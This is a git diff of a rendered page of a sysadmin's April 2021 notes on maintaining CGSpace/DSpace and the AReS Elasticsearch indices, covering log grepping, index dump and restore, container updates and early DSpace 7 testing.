                                                                                                                                                                                                                                                                                                    # grep -a -E '2021-04-06 0(6|7):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -c -a add_item 
                                                                                                                                                                                                                                                                                                    -78
                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                      # grep -a -E '2021-04-06 0(6|7):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -c -a add_item 
                                                                                                                                                                                                                                                                                                      +78
                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                      • Of those 78, 77 of them were from Udana
                                                                                                                                                                                                                                                                                                      • Compared to other mornings (0 to 9 AM) this month that seems to be pretty high:
                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                      # for num in {01..13}; do grep -a -E "2021-04-$num 0" /home/cgspace.cgiar.org/log/dspace.log.2021-04-$num | grep -c -a
                                                                                                                                                                                                                                                                                                      - add_item; done
                                                                                                                                                                                                                                                                                                      -32
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -2
                                                                                                                                                                                                                                                                                                      -8
                                                                                                                                                                                                                                                                                                      -108
                                                                                                                                                                                                                                                                                                      -4
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -29
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -1
                                                                                                                                                                                                                                                                                                      -1
                                                                                                                                                                                                                                                                                                      -2
                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                      # for num in {01..13}; do grep -a -E "2021-04-$num 0" /home/cgspace.cgiar.org/log/dspace.log.2021-04-$num | grep -c -a
                                                                                                                                                                                                                                                                                                      + add_item; done
                                                                                                                                                                                                                                                                                                      +32
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +2
                                                                                                                                                                                                                                                                                                      +8
                                                                                                                                                                                                                                                                                                      +108
                                                                                                                                                                                                                                                                                                      +4
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +29
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +1
                                                                                                                                                                                                                                                                                                      +1
                                                                                                                                                                                                                                                                                                      +2
                                                                                                                                                                                                                                                                                                      +
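
The per-day loop above prints bare counts, so matching a number to its date means counting output lines by hand. Below is a minimal sketch, assuming the same log file naming (`dspace.log.YYYY-MM-DD`) and the same `add_item` marker as the commands above, that prints the date next to each count. The function name `count_morning_submissions` and its arguments are hypothetical, not part of DSpace or the ILRI scripts.

```shell
#!/usr/bin/env bash
# Hypothetical helper: count "add_item" log lines in the hours 00-09 of each
# day, printing the date next to the count.
# Arguments: log directory, year-month (YYYY-MM), last day of month to check.
count_morning_submissions() {
    local log_dir="$1" month="$2" last_day="$3"
    local d day date log

    for ((d = 1; d <= last_day; d++)); do
        # Zero-pad the day so it matches both the file name and the timestamps
        printf -v day '%02d' "$d"
        date="$month-$day"
        log="$log_dir/dspace.log.$date"

        # Skip days with no log file instead of letting grep print an error
        [ -f "$log" ] || continue

        # -a treats the log as text even if it contains binary bytes;
        # "$date 0" matches timestamps whose hour starts with 0 (00 to 09)
        printf '%s %s\n' "$date" "$(grep -a -E "$date 0" "$log" | grep -c -a add_item)"
    done
}
```

It could be called as `count_morning_submissions /home/cgspace.cgiar.org/log 2021-04 13`, which would print one `date count` pair per line for each day that has a log file.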

                                                                                                                                                                                                                                                                                                      2021-04-15

                                                                                                                                                                                                                                                                                                      • Release v1.4.2 of the DSpace Statistics API on GitHub: https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.2
                                                                                                                                                                                                                                                                                                          @@ -723,8 +723,8 @@ Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                        • Create a test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                        $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          • I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
                                                                                                                                                                                                                                                                                                            • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
                                                                                                                                                                                                                                                                                                            • @@ -735,62 +735,62 @@ Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                              • Update all containers on AReS (linode20):
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                              $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                • Then run all system updates and reboot the server
                                                                                                                                                                                                                                                                                                                • I learned a new command for Elasticsearch:
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                $ curl http://localhost:9200/_cat/indices
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-values           ChyhGwMDQpevJtlNWO1vcw 1 1   1579      0 537.6kb 537.6kb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-shared           J_8cxIz6QL6XTRZct7UBBQ 1 1    127      0 115.7kb 115.7kb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-values-00001     jAoXTLR0R9mzivlDVbQaqA 1 1   3903      0 696.2kb 696.2kb
                                                                                                                                                                                                                                                                                                                -green  open .kibana_task_manager_1   O1zgJ0YlQhKCFAwJZaNSIA 1 0      2      2  20.6kb  20.6kb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-users            1hWGXh9kS_S6YPxAaBN8ew 1 1      5      0  28.6kb  28.6kb
                                                                                                                                                                                                                                                                                                                -green  open .apm-agent-configuration f3RAkSEBRGaxJZs3ePVxsA 1 0      0      0    283b    283b
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                -green  open .kibana_1                HHPN7RD_T7qe0zDj4rauQw 1 0     25      7  36.8kb  36.8kb
                                                                                                                                                                                                                                                                                                                -yellow open users                    M0t2LaZhSm2NrF5xb64dnw 1 1      2      0  11.6kb  11.6kb
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  $ curl http://localhost:9200/_cat/indices
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-values           ChyhGwMDQpevJtlNWO1vcw 1 1   1579      0 537.6kb 537.6kb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-shared           J_8cxIz6QL6XTRZct7UBBQ 1 1    127      0 115.7kb 115.7kb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-values-00001     jAoXTLR0R9mzivlDVbQaqA 1 1   3903      0 696.2kb 696.2kb
                                                                                                                                                                                                                                                                                                                  +green  open .kibana_task_manager_1   O1zgJ0YlQhKCFAwJZaNSIA 1 0      2      2  20.6kb  20.6kb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-users            1hWGXh9kS_S6YPxAaBN8ew 1 1      5      0  28.6kb  28.6kb
                                                                                                                                                                                                                                                                                                                  +green  open .apm-agent-configuration f3RAkSEBRGaxJZs3ePVxsA 1 0      0      0    283b    283b
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                  +green  open .kibana_1                HHPN7RD_T7qe0zDj4rauQw 1 0     25      7  36.8kb  36.8kb
                                                                                                                                                                                                                                                                                                                  +yellow open users                    M0t2LaZhSm2NrF5xb64dnw 1 1      2      0  11.6kb  11.6kb
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  • Somehow the openrxv-items-final index only has a few items and the majority are in openrxv-items-temp, via the openrxv-items alias (which is in the temp index):
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty' 
                                                                                                                                                                                                                                                                                                                  -{
                                                                                                                                                                                                                                                                                                                  -  "count" : 103585,
                                                                                                                                                                                                                                                                                                                  -  "_shards" : {
                                                                                                                                                                                                                                                                                                                  -    "total" : 1,
                                                                                                                                                                                                                                                                                                                  -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                  -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                  -    "failed" : 0
                                                                                                                                                                                                                                                                                                                  -  }
                                                                                                                                                                                                                                                                                                                  -}
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty' 
                                                                                                                                                                                                                                                                                                                    +{
                                                                                                                                                                                                                                                                                                                    +  "count" : 103585,
                                                                                                                                                                                                                                                                                                                    +  "_shards" : {
                                                                                                                                                                                                                                                                                                                    +    "total" : 1,
                                                                                                                                                                                                                                                                                                                    +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                    +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                    +    "failed" : 0
                                                                                                                                                                                                                                                                                                                    +  }
                                                                                                                                                                                                                                                                                                                    +}
                                                                                                                                                                                                                                                                                                                    +
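The imbalance between the two item indexes is easier to see with only the index name and document count. The following is a minimal sketch, assuming the default `_cat/indices` column order (health, status, index, uuid, pri, rep, docs.count, ...); `docs_per_index` is a hypothetical helper name, and the sample rows are copied from the output above rather than fetched from a live node.

```shell
#!/bin/sh
# Hypothetical helper: print "index docs.count" pairs from _cat/indices text on stdin.
# Assumes the default column order: health status index uuid pri rep docs.count ...
docs_per_index() {
    awk 'NF >= 7 { print $3, $7 }'
}

# Two rows copied from the output above, used here instead of a live cluster
sample='yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb'

printf '%s\n' "$sample" | docs_per_index
```

Against a running node the same helper could be fed with `curl -s http://localhost:9200/_cat/indices | docs_per_index`, and `curl -s 'http://localhost:9200/_cat/aliases/openrxv-items?v'` should show which index the alias resolves to.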
                                                                                                                                                                                                                                                                                                                    • I found a cool tool to help with exporting and restoring Elasticsearch indexes:
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                    $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                    -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                    -Sun, 18 Apr 2021 06:27:07 GMT | Total Writes: 103585
                                                                                                                                                                                                                                                                                                                    -Sun, 18 Apr 2021 06:27:07 GMT | dump complete
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                      +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                      +Sun, 18 Apr 2021 06:27:07 GMT | Total Writes: 103585
                                                                                                                                                                                                                                                                                                                      +Sun, 18 Apr 2021 06:27:07 GMT | dump complete
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      • It took only two or three minutes to export everything…
                                                                                                                                                                                                                                                                                                                      • I did a test to restore the index:
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                      $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-test --type=mapping
                                                                                                                                                                                                                                                                                                                      -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-test --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-test --type=mapping
                                                                                                                                                                                                                                                                                                                        +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-test --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        • So that’s pretty cool!
                                                                                                                                                                                                                                                                                                                        • I deleted the openrxv-items-final index and openrxv-items-temp indexes and then restored the mappings to openrxv-items-final, added the openrxv-items alias, and started restoring the data to openrxv-items with elasticdump:
                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                        -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                          +$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                          +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                          +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                          • AReS seems to be working fine аfter that, so I created the openrxv-items-temp index and then started a fresh harvest on AReS Explorer:
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ curl -X PUT "localhost:9200/openrxv-items-temp"
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ curl -X PUT "localhost:9200/openrxv-items-temp"
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • Run system updates on CGSpace (linode18) and run the latest Ansible infrastructure playbook to update the DSpace Statistics API, PostgreSQL JDBC driver, etc, and then reboot the system
                                                                                                                                                                                                                                                                                                                            • I wasted a bit of time trying to get TSLint and then ESLint running for OpenRXV on GitHub Actions
                                                                                                                                                                                                                                                                                                                            @@ -798,35 +798,35 @@ $ elasticdump --input=/home/aorth/openrxv-ite
                                                                                                                                                                                                                                                                                                                            • The AReS harvesting last night seems to have completed successfully, but the number of results is strange:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-temp       kNUlupUyS_i7vlBGiuVxwg 1 1 103741 105553 483.6mb 483.6mb
                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-final      HFc3uytTRq2GPpn13vkbmg 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-temp       kNUlupUyS_i7vlBGiuVxwg 1 1 103741 105553 483.6mb 483.6mb
                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-final      HFc3uytTRq2GPpn13vkbmg 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • The indices endpoint doesn’t include the openrxv-items alias, but it is currently in the openrxv-items-temp index so the number of items is the same:
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                                                              -  "count" : 103741,
                                                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                                                +  "count" : 103741,
                                                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • A user was having problems resetting their password on CGSpace, with some message about SMTP etc
                                                                                                                                                                                                                                                                                                                                  • I checked and we are indeed locked out of our mailbox:
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ dspace test-email
                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                -Error sending email:
                                                                                                                                                                                                                                                                                                                                - - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 550 5.2.1 Mailbox cannot be accessed [PR0P264CA0280.FRAP264.PROD.OUTLOOK.COM]
                                                                                                                                                                                                                                                                                                                                -)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ dspace test-email
                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                  +Error sending email:
                                                                                                                                                                                                                                                                                                                                  + - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 550 5.2.1 Mailbox cannot be accessed [PR0P264CA0280.FRAP264.PROD.OUTLOOK.COM]
                                                                                                                                                                                                                                                                                                                                  +)
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • I have to write to ICT…
                                                                                                                                                                                                                                                                                                                                  • I decided to switch back to the G1GC garbage collector on DSpace Test
                                                                                                                                                                                                                                                                                                                                      @@ -850,7 +850,7 @@ Error sending email:
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                   $ cp atmire-cua-update.xml-20210124-132112.old /home/dspacetest.cgiar.org/config/spring/api/atmire-cua-update.xml
                                                                                                                                                                                                                                                                                                                                   $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12 -g
                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                    @@ -869,46 +869,46 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                -$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                  +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                  +$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                  +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                  +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • Then I started a fresh AReS harvest
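The alias step in the commands above can be sketched in Python. This is a minimal illustration, not part of the original workflow: the helper names `build_alias_action` and `indices_for_alias` are hypothetical, and the code only builds and inspects JSON, so it never contacts Elasticsearch. It assumes the same index and alias names used in the `curl` command.

```python
import json


def build_alias_action(index: str, alias: str) -> str:
    """Hypothetical helper: return the JSON body for POST /_aliases
    that adds `alias` to `index` (same shape as the curl -d payload)."""
    return json.dumps({"actions": [{"add": {"index": index, "alias": alias}}]})


def indices_for_alias(alias_response: dict, alias: str) -> list:
    """Hypothetical helper: given the parsed output of GET /_alias,
    return the sorted names of the indices that carry `alias`."""
    return sorted(
        name
        for name, info in alias_response.items()
        if alias in info.get("aliases", {})
    )


if __name__ == "__main__":
    # Payload equivalent to the one posted with curl above
    print(build_alias_action("openrxv-items-final", "openrxv-items"))
```

Passing the parsed `_alias` response to `indices_for_alias` gives a quick way to confirm that only `openrxv-items-final` carries the `openrxv-items` alias before restoring the data.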

                                                                                                                                                                                                                                                                                                                                  2021-04-26

                                                                                                                                                                                                                                                                                                                                  • The AReS harvest last night seems to have finished successfully and the number of items looks good:
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    • And the aliases seem correct for once:
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                    $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                    -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                    -        "aliases": {
                                                                                                                                                                                                                                                                                                                                    -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                    -        }
                                                                                                                                                                                                                                                                                                                                    -    },
                                                                                                                                                                                                                                                                                                                                    -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                    -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                    -    },
                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                      $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                                      +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                      +        "aliases": {
                                                                                                                                                                                                                                                                                                                                      +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                      +        }
                                                                                                                                                                                                                                                                                                                                      +    },
                                                                                                                                                                                                                                                                                                                                      +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                      +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                      +    },
                                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                      • That’s 250 new items in the index since the last harvest!
                                                                                                                                                                                                                                                                                                                                      • Re-create my local Artifactory container because I’m getting errors starting it and it has been a few months since it was updated:
                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                      $ podman rm artifactory
                                                                                                                                                                                                                                                                                                                                      -$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
                                                                                                                                                                                                                                                                                                                                      -$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
                                                                                                                                                                                                                                                                                                                                      -$ podman start artifactory
                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                        $ podman rm artifactory
                                                                                                                                                                                                                                                                                                                                        +$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
                                                                                                                                                                                                                                                                                                                                        +$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
                                                                                                                                                                                                                                                                                                                                        +$ podman start artifactory
                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                        • Start testing DSpace 7.0 Beta 5 so I can evaluate if it solves some of the problems we are having on DSpace 6, and if it’s missing things like multiple handle resolvers, etc
                                                                                                                                                                                                                                                                                                                                          • I see it needs Java JDK 11, Tomcat 9, Solr 8, and PostgreSQL 11
                                                                                                                                                                                                                                                                                                                                          • @@ -925,83 +925,83 @@ $ podman start artifactory
                                                                                                                                                                                                                                                                                                                                          • I tried to delete all the Atmire SQL migrations:
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                          localhost/dspace7b5= > DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            localhost/dspace7b5= > DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            • But I got an error when running dspace database migrate:
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            $ ~/dspace7b5/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                                                            -
